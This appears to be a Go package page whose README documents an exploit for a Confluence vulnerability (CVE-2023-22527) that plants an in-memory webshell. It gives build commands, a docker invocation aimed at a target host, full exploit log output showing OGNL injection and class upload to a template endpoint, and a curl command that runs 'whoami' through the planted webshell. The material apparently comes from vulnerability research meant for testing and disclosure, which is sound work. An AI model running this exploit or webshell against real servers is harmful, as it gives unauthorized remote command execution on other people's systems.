webshell

command module

v0.0.0-...-1b4b94d Latest Latest Go to latest Published: Apr 17, 2024 License: Apache-2.0 Imports: 13 Imported by: 0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/vulncheck-oss/cve-2023-22527

Links

Open Source Insights

README ¶

In Memory Confluence Webshell

This exploit will load a webshell into Confluence's memory. The webshell is implemented in ABCDEFG.java although a random name will be assigned to it at exploitation time. After exploitation, the attacker can execute arbitrary programs via curl.

Compiling

To build a docker image:

make docker

If you have a Go and Java build environment handy, you can also just use make:

albinolobster@mournland:~/cve-2023-22527/webshell$ make
gofmt -d -w cve-2023-22527.go 
golangci-lint run --fix cve-2023-22527.go
javac ABCDEFG.java -classpath ./lib/servlet-api.jar
Note: ABCDEFG.java uses or overrides a deprecated API.
Note: Recompile with -Xlint:deprecation for details.
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-22527_linux-arm64 cve-2023-22527.go

Usage Example

Add the webshell:

albinolobster@mournland:~/cve-2023-22527/webshell$ sudo docker run -it --network=host webshell -a -v -c -e -rhost 10.9.49.76 -rport 8090
time=2024-03-05T16:34:21.251Z level=STATUS msg="Starting target" index=0 host=10.9.49.76 port=8090 ssl=false "ssl auto"=true
time=2024-03-05T16:34:21.390Z level=STATUS msg="Validating Confluence target" host=10.9.49.76 port=8090
time=2024-03-05T16:34:23.094Z level=SUCCESS msg="Target verification succeeded!" host=10.9.49.76 port=8090 verified=true
time=2024-03-05T16:34:23.094Z level=STATUS msg="Running a version check on the remote target" host=10.9.49.76 port=8090
time=2024-03-05T16:34:23.334Z level=VERSION msg="The self-reported version is: 8.5.3" host=10.9.49.76 port=8090 version=8.5.3
time=2024-03-05T16:34:23.334Z level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.76 port=8090 vulnerable=yes
time=2024-03-05T16:34:23.334Z level=STATUS msg="Sending OGNL expression size limit adjustment to http://10.9.49.76:8090/template/aui/text-inline.vm"
time=2024-03-05T16:34:23.520Z level=STATUS msg="Sending class VbbsGkzxox to http://10.9.49.76:8090/template/aui/text-inline.vm"
time=2024-03-05T16:34:23.720Z level=SUCCESS msg="In memory webshell available using VicodMajitk param"
time=2024-03-05T16:34:23.720Z level=SUCCESS msg="Example usage: curl -kv http://10.9.49.76:8090/?VicodMajitk=whoami"
time=2024-03-05T16:34:23.720Z level=SUCCESS msg="Exploit successfully completed" exploited=true

Use the webshell:

albinolobster@mournland:~/cve-2023-22527/webshell$ curl http://10.9.49.76:8090/?VicodMajitk=whoami
nt authority\network service

Documentation ¶

There is no documentation for this package.

Source Files ¶

View all Source files

cve-2023-22527.go

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL